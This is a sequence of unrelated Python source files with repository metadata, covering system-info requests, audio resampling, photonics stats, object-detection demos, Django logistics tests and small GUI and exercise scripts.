computer-micro-mangangement/cmm_hub
1ec4ed8c86edcbbd5624396a4be1d6aa7e6132fb
[ "MIT" ]
null
null
null
storage.py
computer-micro-mangangement/cmm_hub
1ec4ed8c86edcbbd5624396a4be1d6aa7e6132fb
[ "MIT" ]
null
null
null
storage.py
computer-micro-mangangement/cmm_hub
1ec4ed8c86edcbbd5624396a4be1d6aa7e6132fb
[ "MIT" ]
null
null
null
import psutil from appJar import gui import config import requests as req import json import platform import sysInfo app = gui(title="CMM Hub", showIcon=False) navBarElements = [] navBarElementsCallName = [] currentContainer = "" def get_size(bytes, suffix="B"): """ Scale bytes to its proper format e.g: 1253656 => '1.20MB' 1253656678 => '1.17GB' """ factor = 1024 for unit in ["", "K", "M", "G", "T", "P"]: if bytes < factor: return f"{bytes:.2f}{unit}{suffix}" bytes /= factor def getServerInfo(): request = req.get(config.getServerAddress() + "/api/info", verify=False) if request.status_code == 200: jsonData = json.loads(request.text) return jsonData return {} def getUserInfo(): request = req.get(config.getServerAddress() + "/api/user/currentUser", verify=False, params={"devicesecret": config.getDeviceSecret()}) if request.status_code == 200: jsonData = json.loads(request.text) return jsonData return {} def getInstallableModules(): serverInfo = getServerInfo() moduleListURL = serverInfo["moduleListURL"] request = req.get(moduleListURL, verify=False) if request.status_code == 200: modules = {} data = request.text lines = data.split('\n') for line in lines: elements = line.split(',') modules[elements[0]] = {} modules[elements[0]]["link"] = elements[1].replace(" ", "") modules[elements[0]]["name"] = elements[0].capitalize() modules[elements[0]]["version"] = elements[2].replace(" ", "") return modules def getDeviceInfo(): deviceInfo = {} uname = platform.uname() deviceInfo["os"] = uname.system + str(uname.release) deviceInfo["name"] = uname.node deviceInfo["architecture"] = uname.machine deviceInfo["processor"] = {} deviceInfo["processor"]["processor Declaration"] = uname.processor deviceInfo["processor"]["cores"] = psutil.cpu_count(logical=False) deviceInfo["processor"]["threads"] = psutil.cpu_count(logical=True) svmem = psutil.virtual_memory() deviceInfo["installed RAM"] = get_size(svmem.total) return deviceInfo
28.653846
88
0.630425
239
2,235
5.861925
0.464435
0.03212
0.045682
0.040685
0.189864
0.189864
0.135617
0.104211
0.104211
0.104211
0
0.025287
0.221477
2,235
77
89
29.025974
0.779885
0.039374
0
0.155172
0
0
0.100047
0.021606
0
0
0
0
0
1
0.086207
false
0
0.12069
0
0.327586
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd85a5016f4253e00cc44d9424523f4276b499b6
128
py
Python
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_1/_pkg0_1_0_1_0/_mod0_1_0_1_0_4.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_1/_pkg0_1_0_1_0/_mod0_1_0_1_0_4.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_1/_pkg0_1_0_1_0/_mod0_1_0_1_0_4.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
name0_1_0_1_0_4_0 = None name0_1_0_1_0_4_1 = None name0_1_0_1_0_4_2 = None name0_1_0_1_0_4_3 = None name0_1_0_1_0_4_4 = None
14.222222
24
0.820313
40
128
1.875
0.175
0.266667
0.466667
0.533333
0.88
0.88
0.746667
0
0
0
0
0.318182
0.140625
128
9
25
14.222222
0.363636
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
1
null
1
1
1
1
1
1
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
10
bd86643159f81b1a7609b03844ed56a6c9324674
1,988
py
Python
teste.py
yagopessoa/extrator-caracteristicas
8fb54359836f2a7063fb34849bfdb1b4c88188b1
[ "MIT" ]
null
null
null
teste.py
yagopessoa/extrator-caracteristicas
8fb54359836f2a7063fb34849bfdb1b4c88188b1
[ "MIT" ]
4
2021-03-19T01:36:12.000Z
2022-01-13T01:21:07.000Z
teste.py
yagopessoa/extrator-caracteristicas
8fb54359836f2a7063fb34849bfdb1b4c88188b1
[ "MIT" ]
null
null
null
#!/usr/bin/python3 import cv2 import numpy as np import sys import os import pickle import datetime import base64 import io from matplotlib import pyplot as plt from PIL import Image import extract_feature # x = np.random.randint(25,100,25) # y = np.random.randint(175,255,25) # z = np.hstack((x,y)) # z = z.reshape((50,1)) # z = np.float32(z) # # plt.hist(z,256,[0,256]),plt.show() # # Define criteria = ( type, max_iter = 10 , epsilon = 1.0 ) # criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0) # # Set flags (Just to avoid line break in the code) # flags = cv2.KMEANS_RANDOM_CENTERS # # Apply KMeans # compactness,labels,centers = cv2.kmeans(z,2,None,criteria,10,flags) # A = z[labels==0] # B = z[labels==1] # # Now plot 'A' in red, 'B' in blue, 'centers' in yellow # plt.hist(A,256,[0,256],color = 'r') # plt.hist(B,256,[0,256],color = 'b') # plt.hist(centers,32,[0,256],color = 'y') # plt.show() # img = cv2.imread('C:\\Users\\yagor\\extrator-caracteristicas\\banco_imagens\\Parthenon\\spencer-davis-1533814-unsplash.jpg', cv2.COLOR_BGR2RGB) # # blur = cv2.bilateralFilter(img,9,500,500) # cinza = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # canny = cv2.Canny(cinza, 150,150) # plt.subplot(121),plt.imshow(img) # plt.title('Imagem original'), plt.xticks([]), plt.yticks([]) # plt.subplot(122),plt.imshow(canny) # plt.title('Imagem filtrada'), plt.xticks([]), plt.yticks([]) # plt.show() imagens = extract_feature.ler_diretorio_imagens("banco_imagens/Colosseum") imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Eiffel") imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Louvre") imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Parthenon") size = 300, 300 for imagem in imagens: real_img = Image.open(imagem) sqr_img = extract_feature.make_square(real_img) sqr_img.thumbnail(size, Image.ANTIALIAS) sqr_img.save(imagem.replace('banco_imagens', 'banco_imagens_sqr').replace('.jpg', '.png'))
30.121212
145
0.71328
309
1,988
4.466019
0.417476
0.06087
0.068841
0.069565
0.181159
0.150725
0.150725
0.150725
0
0
0
0.061574
0.117706
1,988
65
146
30.584615
0.7252
0.583501
0
0
0
0
0.156368
0.058008
0
0
0
0
0
1
0
false
0
0.52381
0
0.52381
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
bd87f0189f7348f8a469b192ca7c10a825cc2fa1
95
py
Python
lampions/__init__.py
Lampions/lampions
dac00e739b6361820f400a3a439dadd5d265c0d7
[ "BSD-3-Clause" ]
null
null
null
lampions/__init__.py
Lampions/lampions
dac00e739b6361820f400a3a439dadd5d265c0d7
[ "BSD-3-Clause" ]
null
null
null
lampions/__init__.py
Lampions/lampions
dac00e739b6361820f400a3a439dadd5d265c0d7
[ "BSD-3-Clause" ]
null
null
null
from . import console from .version import __version__ # noqa def main(): console.run()
13.571429
40
0.694737
12
95
5.166667
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.210526
95
6
41
15.833333
0.826667
0.042105
0
0
0
0
0
0
0
0
0
0
0
1
0.25
true
0
0.5
0
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
0
0
0
5
bd884de362569f988f5fe329cd6525259b1ae410
1,840
py
Python
lawliet/mono/resample.py
Ryuk17/lawliet
ba4734557260b255896707210fca3e2fff311e87
[ "Apache-2.0" ]
2
2021-04-20T03:51:32.000Z
2021-06-16T11:48:06.000Z
lawliet/mono/resample.py
Ryuk17/lawliet
ba4734557260b255896707210fca3e2fff311e87
[ "Apache-2.0" ]
null
null
null
lawliet/mono/resample.py
Ryuk17/lawliet
ba4734557260b255896707210fca3e2fff311e87
[ "Apache-2.0" ]
null
null
null
""" @FileName: resample.py @Description: Implement resample @Author: Ryuk @CreateDate: 2021/06/27 @LastEditTime: 2021/06/27 @LastEditors: Please set LastEditors @Version: v0.1 """ import numpy as np import math __all__ = [ "direct_interpolation", "lagrange_interpolation", "sine_interpolation", ] def direct_interpolation(x, L, M): """ resample signal with direct interpolation :param x: input signal :param L: original frequency :param M: target frequency :return: resampled signal """ N = len(x) K = int((M / L) * N) factor = L / M y = np.zeros(K) for k in range(K): nk = factor * k n = math.floor(nk) if n + 1 >= len(x): continue w1 = nk - n w2 = 1 - w1 y[k] = w1 * x[n + 1] + w2 * x[n] return y def lagrange_interpolation(x, w, L, M): N = len(x) K = int((M / L) * N) factor = L / M y = np.zeros(K) for k in range(K): nk = factor * k n = math.floor(nk) - 1 for i in range(-w, w, 1): numerator = 1 denominator = 1 if n - i >= len(x): continue for j in range(-w, w, 1): if i != j: numerator *= nk - (n - j) denominator *= (j - i) y[k] += x[n - i] * numerator / denominator return y def sine_interpolation(x, w, L, M): N = len(x) K = int((M / L) * N) factor = L / M y = np.zeros(K) for k in range(K): nk = factor * k n = math.floor(nk) for i in range(-w, w, 1): if n - i >= len(x): continue if nk - n + i == 0: continue numerator = math.sin((nk - n + i)) denominator = math.pi * (nk - n +i) y[k] += x[n - i] * numerator / denominator return y
23.589744
54
0.490761
264
1,840
3.382576
0.246212
0.015677
0.016797
0.020157
0.402016
0.402016
0.388578
0.320269
0.320269
0.320269
0
0.028621
0.37337
1,840
77
55
23.896104
0.74588
0.17337
0
0.54717
0
0
0.040486
0.014845
0
0
0
0
0
1
0.056604
false
0
0.037736
0
0.150943
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd89d14addd7fd9824eb02e80c4487068be6700a
1,432
py
Python
data/get_stats.py
joamatab/angler
d54d3718bfc8564f0a97faf89a8de747709be6b9
[ "MIT" ]
102
2018-11-06T16:11:58.000Z
2022-03-29T03:10:08.000Z
data/get_stats.py
bencbartlett/angler
db9eca35adc4708425de8e2e2ad7a06516966814
[ "MIT" ]
17
2018-11-06T15:53:15.000Z
2020-07-21T20:20:30.000Z
data/get_stats.py
bencbartlett/angler
db9eca35adc4708425de8e2e2ad7a06516966814
[ "MIT" ]
41
2018-11-21T08:43:03.000Z
2022-03-22T21:21:42.000Z
import numpy as np from device_saver import load_device """ Opens a device and prints its stored stats for the paper""" def get_stats(fname): print("\n============================================================") D = load_device(fname) print('input power of {:.4f} mW/um'.format(D.W_in*1000)) if hasattr(D, 'index_shift'): index_shift = D.index_shift else: index_shift = D.simulation.compute_index_shift() print('index shift: {:.2E}'.format(np.max(index_shift))) print('Q-factor: {:.2E}'.format(D.Q)) print('bandwidth: {:.1f} GHz'.format(D.FWHM / 1e9)) if D.structure_type == 'two_port': print('linear transmission: {:.4f}'.format(D.T_lin)) print('nonlinear transmission: {:.4f}'.format(D.T_nl)) elif D.structure_type == 'ortho_port': print('linear transmission (right) = {:.4f} %'.format(100*D.W_right_lin / D.W_in)) print('linear transmission (top) = {:.4f} %'.format(100*D.W_top_lin / D.W_in)) print('nonlinear transmission (right) = {:.4f} %'.format(100*D.W_right_nl / D.W_in)) print('nonlinear transmission (top) = {:.4f} %'.format(100*D.W_top_nl / D.W_in)) print("============================================================\n") if __name__ == '__main__': fname2 = 'data/figs/devices/2_port.p' get_stats(fname2) fnameT = 'data/figs/devices/T_port.p' get_stats(fnameT)
36.717949
95
0.569134
194
1,432
3.984536
0.381443
0.023286
0.025873
0.062096
0.310479
0.217335
0.170763
0.170763
0
0
0
0.026609
0.186453
1,432
39
96
36.717949
0.63691
0
0
0
0
0
0.383212
0.128467
0
0
0
0
0
1
0.037037
false
0
0.074074
0
0.111111
0.444444
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
bd8b0ea4d67316a57577ad9cd394adb4172f74c1
2,130
py
Python
src/demo.py
lhcezx/Graph-FPN
55eb9283a7df83e003c84eede65a2700bb9fa45c
[ "MIT" ]
19
2021-11-16T05:32:45.000Z
2022-01-27T09:29:50.000Z
src/demo.py
lhcezx/Graph-FPN
55eb9283a7df83e003c84eede65a2700bb9fa45c
[ "MIT" ]
1
2021-11-15T15:44:45.000Z
2021-12-13T04:26:26.000Z
src/demo.py
lhcezx/Graph-FPN
55eb9283a7df83e003c84eede65a2700bb9fa45c
[ "MIT" ]
1
2022-01-04T14:10:58.000Z
2022-01-04T14:10:58.000Z
import os import zipfile import tensorflow as tf import tensorflow_datasets as tfds import init_path from configs.configs import parse_configs from detection.utils.Label import * from detection.utils.preprocess import * from model.network import DecodePredictions from model.get_model import backbone, models config = parse_configs() def get_demo_data(): url = "https://github.com/srihari-humbarwadi/datasets/releases/download/v0.1.0/data.zip" filename = os.path.join(config.root_dir, "data_demo", "data.zip") tf.keras.utils.get_file(filename, url) with zipfile.ZipFile(filename, "r") as z_fp: z_fp.extractall(os.path.join(config.root_dir,"data_demo/")) def demo(): get_demo_data() model = models[config.Arch](config.num_classes, backbone[config.backbone]) # fine_tune_checkpoint_type ckpt = tf.train.Checkpoint(model) ckpt.restore(tf.train.latest_checkpoint(config.weight)).expect_partial() # Prepare image for demo val_dataset, dataset_info = tfds.load("coco/2017", split="validation", with_info=True, data_dir=os.path.join(config.root_dir,"data_demo/data"), download=False) int2str = dataset_info.features["objects"]["label"].int2str for sample in val_dataset.take(2): image = tf.cast(sample["image"], dtype=tf.float32) input_image, ratio_short, ratio_long = prepare_image(image) # Inference predictions = model(input_image) detections = DecodePredictions(confidence_threshold=0.5)(input_image, predictions) num_detections = detections.valid_detections[0] class_names = [int2str(int(x)) for x in detections.nmsed_classes[0][:num_detections]] visualize_detections(image, detections.nmsed_boxes[0][:num_detections].numpy(), class_names, detections.nmsed_scores[0][:num_detections].numpy(), ratio_short, ratio_long ) if __name__ == "__main__": demo()
39.444444
99
0.656338
258
2,130
5.193798
0.426357
0.023881
0.022388
0.035821
0.075373
0.075373
0.075373
0.075373
0.052239
0
0
0.011714
0.238498
2,130
54
100
39.444444
0.814427
0.02723
0
0
0
0.023256
0.080232
0
0
0
0
0
0
1
0.046512
false
0
0.232558
0
0.27907
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd8b4af603fe82e4afc80393a64f4cdf97c3311e
337
py
Python
dfmbot/fb_dfmbot/models.py
acjh/dfm-bot
34a7d53861acea6a7287c9b4816806db864adb31
[ "MIT" ]
null
null
null
dfmbot/fb_dfmbot/models.py
acjh/dfm-bot
34a7d53861acea6a7287c9b4816806db864adb31
[ "MIT" ]
null
null
null
dfmbot/fb_dfmbot/models.py
acjh/dfm-bot
34a7d53861acea6a7287c9b4816806db864adb31
[ "MIT" ]
null
null
null
from __future__ import unicode_literals from django.db import models # Create your models here. class Person(models.Model): first_name = models.CharField(max_length=30) last_name = models.CharField(max_length=30) fbid = models.CharField(max_length=64, primary_key=True) last_message = models.CharField(max_length=255)
28.083333
60
0.774481
48
337
5.166667
0.583333
0.241935
0.290323
0.387097
0.241935
0.241935
0
0
0
0
0
0.031034
0.139466
337
11
61
30.636364
0.824138
0.071217
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.285714
0
1
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
bd8bd77a5f4099e04b2c3dc2363a8eb44444ab90
16,569
py
Python
routelift_api/stops/tests.py
BitMask-Technologies/route-lift-api
7ac78c6cce523fc5a3852dca7b289fe3a5f3afa8
[ "MIT" ]
null
null
null
routelift_api/stops/tests.py
BitMask-Technologies/route-lift-api
7ac78c6cce523fc5a3852dca7b289fe3a5f3afa8
[ "MIT" ]
7
2021-06-24T16:12:09.000Z
2021-08-05T16:09:22.000Z
routelift_api/stops/tests.py
BitMask-Technologies/route-lift-api
7ac78c6cce523fc5a3852dca7b289fe3a5f3afa8
[ "MIT" ]
null
null
null
from datetime import datetime from django.contrib.auth.hashers import make_password from Logistics.models import LogisticCompanies from roles_and_permissions.operations import Operations from roles_and_permissions.resource_categories import ResourceCategories from roles_and_permissions.utils import createStaffRole from .models import StopFeedback, Stops import uuid from django.conf import settings from django.test import Client, TestCase from Users.models import Drivers # Create your tests here. client = Client() secret = settings.ROOT_SECRET content_type = "application/json" class StopTests(TestCase): @classmethod def setUpTestData(cls): global secret global content_type payload = { "name": "New Logistics5", "email": "info@newlogistics5.com", "phone": "08099514386", "address": "plot 7, The providince street", "city": "Shasha", "state": "Lagos", "country": "Nigeria", "description": "the powerful logistics", "motto": "the best", "administratorLastName": "Umoh", "administratorFirstName": "Simeon", "administratorUsername": "simeone05", "administratorEmail": "simeoneumoh@gmail.com", "administratorPhone": "08099514739", "administratorPassword": "mickey01" } response = client.post( '/v1/logistics', payload, content_type=content_type, HTTP_Secret=secret ) print(response) login_payload = { "userIdentity": "08099514739", "password": "mickey01", } driver_payload = { "firstname": "Simeone", "lastname": "Umoh", "username": "simlogistics", "email": "simonumoh@mailinator.com", "phone": "+234567890", "password": "whatever1" } login_response = client.post(path="/v1/login", data=login_payload, content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, follow=True, secure=False, HTTP_ACCEPT='application/json', ) driver_response = client.post(path="/v1/users/drivers", data=driver_payload, follow=True, secure=False, HTTP_ACCEPT='application/json', content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, HTTP_Token=login_response.json()['data'][ 'accessToken'] ) print(driver_response) company = LogisticCompanies.objects.first() driver = Drivers.objects.get(user_name="simlogistics") stop = Stops.objects.create( id=int(str(uuid.uuid4().int)[::6]), sender_name='Simeon Umoh', sender_address='14 Ogidi Crescent, Lagos', sender_phone='08099514739', sender_email='simeoneumoh@gmail.com', receiver_name='Matthew Odeyemi', receiver_address='Plot 8 the Providence Street', receiver_phone='08160267172', receiver_email='mattode@outlook.com', vehicle_type='motorcycle', additional_note='apartment', stop_time_window='50', load_capacity='large', stop_duration='10', priority_level='normail', driver=driver, company=company ) stop.save() def test_createStop(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) driverId = Drivers.objects.get(user_name="simlogistics").id payload = { "senderName": "Simeon Umoh", "senderAddress": "14 Ogidi Crescent, Lagos", "senderPhone": "08099514739", "senderEmail": "simeoneumoh@gmail.com", "receiverName": "Matthew Odeyemi", "receiverAddress": "Plot 8 the Providence Street", "receiverPhone": "08160267172", "receiverEmail": "mattode@outlook.com", "vehicleType": "motorcycle", "additionalNote": "Bring to the apartment", "stopTimeWindow": "50", "driverId": driverId, "loadCapacity": "large", "stopDuration": "10", "priorityLevel": "normal" } response = client.post('/v1/stops', payload, content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. self.assertEqual(response.status_code, 200) def test_retrieveCompanyStops(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) response = client.get('/v1/stops', content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. self.assertEqual(response.status_code, 200) def test_updateStop(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) stopId = Stops.objects.first().id driverId = Drivers.objects.get(user_name="simlogistics").id payload = { "senderName": "Simeon Umoh", "senderAddress": "14 Ogidi Crescent, Lagos", "senderPhone": "08099514739", "senderEmail": "simeoneumoh@gmail.com", "receiverName": "Matthew Odeyemi", "receiverAddress": "Plot 8 the Providence Street", "receiverPhone": "08160267172", "receiverEmail": "mattode@outlook.com", "vehicleType": "motorcycle", "additionalNote": "Bring to the apartment", "stopTimeWindow": "50", "driverId": driverId, "loadCapacity": "large", "stopDuration": "10", "priorityLevel": "normal" } response = client.put(f'/v1/stops/{stopId}', payload, content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. self.assertEqual(response.status_code, 200) def test_updateStopStatus(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) print(login_response.status_code) stopId = Stops.objects.first().id payload = { "feedback": "Completed" } response = client.put(f'/v1/stops/{stopId}?status=arrived', payload, content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. self.assertEqual(response.status_code, 200) def test_retrieveStop(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) stopId = Stops.objects.first().id response = client.get(f'/v1/stops/{stopId}', content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. self.assertEqual(response.status_code, 200) def test_deleteStop(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) stopId = Stops.objects.first().id response = client.delete(f'/v1/stops/{stopId}', content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. self.assertEqual(response.status_code, 200) class FeedbackTest(TestCase): """feedback test begin""" @classmethod def setUpTestData(cls): company = LogisticCompanies.objects.create( id=1, name="First Company", email="test@mail.com", phone="08123456789", address="address", city="city", state="state", country="country", logo="logo", description="description", motto="motto", paid_until="2021-08-08", created_at=datetime.now() ) company.save() resources = ResourceCategories.list() operations = Operations.list() permissions = {resource: operations for resource in resources} role = createStaffRole( "company_admin", permissions, company ) role.save() driver = Drivers.objects.create( id=int(str(uuid.uuid4().int)[::6]), first_name="Benevolent", last_name="Gand", user_name="bcx", phone="08111111111", email="test@mail.com", password=make_password("password"), role=role, company=company, created_at=datetime.now() ) driver.save() stop = Stops.objects.create( id=int(str(uuid.uuid4().int)[::6]), sender_name='Simeon Umoh', sender_address='14 Ogidi Crescent, Lagos', sender_phone='08099514739', sender_email='simeoneumoh@gmail.com', receiver_name='Matthew Odeyemi', receiver_address='Plot 8 the Providence Street', receiver_phone='08160267172', receiver_email='mattode@outlook.com', vehicle_type='motorcycle', additional_note='apartment', stop_time_window='50', load_capacity='large', stop_duration='10', priority_level='normail', driver=driver, company=company ) stop.save() stop_feedback = StopFeedback.objects.create( message="This is an automated message", # file=file, stop=stop ) stop_feedback.save() def test_create_stop_feedback(self): """pass""" browser = Client() login_payload = { "userIdentity": "bcx", "password": "password", } stop = Stops.objects.get(receiver_phone='08160267172').id feedback_payload = { "message": "message", "stop": stop } login_response = browser.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, follow=True, secure=False, HTTP_ACCEPT='application/json', ) response = browser.post(path="/v1/stops/feedback", data=feedback_payload, follow=True, secure=False, HTTP_ACCEPT='application/json', content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, HTTP_Token=login_response.json()['data'][ 'accessToken'] ) self.assertEqual(response.status_code, 200) def test_get_all_stop_feedbacks(self): browser = Client() login_payload = { "userIdentity": "bcx", "password": "password", } login_response = browser.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, follow=True, secure=False, HTTP_ACCEPT='application/json', ) response = browser.get(path="/v1/stops/feedback", follow=True, secure=False, HTTP_ACCEPT='application/json', content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, HTTP_Token=login_response.json()['data']['accessToken']) self.assertEqual(response.status_code, 200) def test_retrieve_stop_feedback(self): """pass""" browser = Client() login_payload = { "userIdentity": "bcx", "password": "password", } login_response = browser.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, follow=True, secure=False, HTTP_ACCEPT='application/json', ) feedback_id = StopFeedback.objects.first().id response = browser.get(path="/v1/stops/feedback/{}".format(feedback_id), follow=True, secure=False, HTTP_ACCEPT='application/json', content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, HTTP_Token=login_response.json()['data']['accessToken'] ) self.assertEqual(response.status_code, 200) # def test_delete_stop_feedback(self): # """pass""" # browser = Client() # login_payload = { # "userIdentity": "bcx", # "password": "password", # } # login_response = browser.put(path="/v1/login?user_type=staff", data=login_payload, # content_type="application/json", # HTTP_SECRET=settings.TEST_SECRET, follow=True, # secure=False, HTTP_ACCEPT='application/json', ) # feedback_id = StopFeedback.objects.first().id # response = browser.delete(path="/v1/stop/feedback/{}".format(feedback_id), # follow=True, secure=False, # HTTP_ACCEPT='application/json', # content_type="application/json", # HTTP_SECRET=settings.TEST_SECRET, # HTTP_Token=login_response.json()['data'][ # 'accessToken'] # ) # self.assertEqual(response.status_code, 200)
41.735516
124
0.5153
1,387
16,569
5.991348
0.165105
0.042359
0.045006
0.053189
0.725752
0.718652
0.704091
0.689892
0.689892
0.6858
0
0.035389
0.377512
16,569
396
125
41.840909
0.770312
0.080874
0
0.551929
0
0
0.205861
0.033915
0
0
0
0
0.026706
1
0.032641
false
0.041543
0.032641
0
0.071217
0.008902
0
0
0
null
0
0
0
0
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
bd8ea1d2de449075397b869d74b1b5b0f41e34e1
550
py
Python
exercicios-python/ex042.py
DaviStalleiken/codigos-de-desafios
e9ec388022b5f4bb2a5ab170c17969154ceaece3
[ "MIT" ]
null
null
null
exercicios-python/ex042.py
DaviStalleiken/codigos-de-desafios
e9ec388022b5f4bb2a5ab170c17969154ceaece3
[ "MIT" ]
null
null
null
exercicios-python/ex042.py
DaviStalleiken/codigos-de-desafios
e9ec388022b5f4bb2a5ab170c17969154ceaece3
[ "MIT" ]
null
null
null
r1 = float(input('Primeiro segmento: ')) r2 = float(input('Segundo segmento: ')) r3 = float(input('Terceiro segmento: ')) if r1 < r2 + r3 and r2 < r1 + r3 and r3 < r2 + r3: print('Você \033[32mpode\033[m formar um triângulo. ', end='') if r1 == r2 == r3: print(f'Seu triângulo é \033[36mequilátero\033[m.') elif r1 != r2 != r3 != r1: print(f'Seu triângulo é \033[36mescaleno\033[m.') else: print(f'Seu triângulo é \033[36misósceles\033[m.') else: print('Você \033[31mnão pode\033[m formar um triângulo.')
36.666667
66
0.612727
85
550
3.964706
0.352941
0.059347
0.053412
0.160237
0.320475
0.195846
0
0
0
0
0
0.136891
0.216364
550
14
67
39.285714
0.645012
0
0
0.153846
0
0
0.489091
0.130909
0
0
0
0
0
1
0
false
0
0
0
0
0.384615
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bd8fec37c8f22bdce7067ff7cbd8f9c6cdace31b
1,158
py
Python
mimic/GUI/MainWindow.py
link00000000/mimic
9452f4311e70deb23286504d9b02c64b9a76e14c
[ "MIT" ]
2
2021-07-29T04:30:34.000Z
2021-08-06T04:58:39.000Z
mimic/GUI/MainWindow.py
link00000000/mimic
9452f4311e70deb23286504d9b02c64b9a76e14c
[ "MIT" ]
20
2021-04-02T17:03:53.000Z
2021-08-07T11:04:09.000Z
mimic/GUI/MainWindow.py
link00000000/mimic
9452f4311e70deb23286504d9b02c64b9a76e14c
[ "MIT" ]
null
null
null
"""Mimic main window.""" import tkinter as tk from mimic.EventEmitter import EventEmitter from mimic.GUI.AbstractTkinterWindow import AbstractTkinterWindow from mimic.GUI.Widgets.QRCode import QRCodeImage from mimic.Utils.Host import resolve_host class MainWindow(AbstractTkinterWindow, EventEmitter): """Mimic main window.""" widgets: list[tk.Widget] = [] def __init__(self, master: tk.Tk): """ Attaches main window to the main Tkinter instance. Should only pass the amin Tkinter instance as the `master`. I don't knwo what will happen if we try to nest windows inside eachother. Args: master (tk.Tk): Master Tkinter instance """ super().__init__(master) self.master = master self.title("Mimic") self.hide() self.create_widgets() # Hide when the close button ("x button") is clicked self.protocol("WM_DELETE_WINDOW", self.hide) def create_widgets(self): """Register widgets to window.""" qr_code = QRCodeImage(self, f"https://{resolve_host()}:8080") qr_code.pack()
27.571429
70
0.644214
139
1,158
5.251799
0.489209
0.049315
0.041096
0
0
0
0
0
0
0
0
0.004657
0.258204
1,158
41
71
28.243902
0.845169
0.305699
0
0
0
0
0.068966
0
0
0
0
0
0
1
0.117647
false
0
0.294118
0
0.529412
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
